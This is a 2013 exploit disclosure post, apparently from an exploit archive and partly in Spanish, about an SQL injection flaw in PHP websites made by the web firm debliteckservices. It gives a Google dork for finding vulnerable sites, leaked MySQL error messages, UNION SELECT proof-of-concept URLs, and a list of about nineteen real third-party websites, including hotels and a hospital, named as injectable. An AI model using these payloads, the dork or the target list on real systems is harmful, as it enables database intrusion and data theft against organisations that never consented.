[0day] debliteckservices / SQL Injection vulnerability

# Exploit Title: debliteckservices / SQL Injection vulnerability # Date: 02/02/2013 # Exploit Author: Diego_Asencio || r4z0r_bl4ck # Twitter: @r4z0r_bl4ck # Blog: http://r4z0rbl4ck.wordpress.com/ # Vendor Homepage: http://www.debliteckservices.com/ # Tested on: Windows Ultimate - Linux Ubuntu # Categoria: WebApps - PHP # Google Dork: inurl:gallery.php?id= intextebliteck # WorkGroup: @inside0utside -= INFORMACION =- La empresa debliteckservices dedicada al diseño y desarrollo web, dentro de su portafolio de trabajo contiene paginas web en lenguaje PHP con vulnerabilidad de SQL, la cual permite al atacante inyectar peticiones o consultas a la base de datos. -= MYSQL ERROR's =- 1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and state='ACTIVE' order by sort limit 0,12' at line 1 2) Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/h/o/domain/public_html/include/function.php on line 97 3) Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/x/y/domain/public_html/header.php on line 82 4) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/n/o/domain/web/public_html/header.php on line 13 -= XPL (PoC) =- http://127.0.0.1/gallery.php?id=1+union+all+select+0,1,2,3,4-- http://127.0.0.1/section.php?id=1+union+all+select+0,1,2,3,4-- http://127.0.0.1/article.php?id=1+union+all+select+0,1,2,3,4-- -= DEMO's =- http://www.st-raphaelhospital.com/gallery.php?id=6' (SQLi) http://www.coralsearesorts.eu/gallery.php?id=15' (SQLi) http://www.nplanitis.com/gallery.php?id=8' (SQLi) http://www.camel-park.com/gallery.php?id=2' (SQLi) http://www.underseawalkers.com/gallery.php?id=1' (SQLi) http://www.bellsinn.com/gallery.php?id=2' (SQLi) http://www.olympicresidence.com/gallery.php?id=13' (SQLi) http://www.kanika-ibc.com/gallery.php?id=2' (SQLi) http://www.limocy.com/gallery.php?id=4' (SQLi) http://www.demetriseliaproperties.com/gallery.php?id=3' (SQLi) http://www.forcecars.com/gallery.php?id=1' (SQLi) http://www.newfamagustahotel.com/gallery.php?id=6' (SQLi) http://d-kombosdevelopers.com/gallery.php?id=7' (SQLi) http://xylophagou.com/gallery.php?id=3' (SQLi) http://www.easyriders.com.cy/gallery.php?id=3' (SQLi) http://www.agf.com.cy/gallery.php?id=1' (SQLi) http://www.nissi-beach.com/section.php?id=20' (SQLi) http://www.hotelsayianapa.com/section.php?id=7' (SQLi) http://www.nozomi.com.cy/article.php?id=45' (SQLi) ################################# Agradecimientos a: @Sr_Xaoc @inside0utside - t34m / - all members @r4z0r_bl4ck @sr_xaoc @MaximusWell @MikeSoft -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-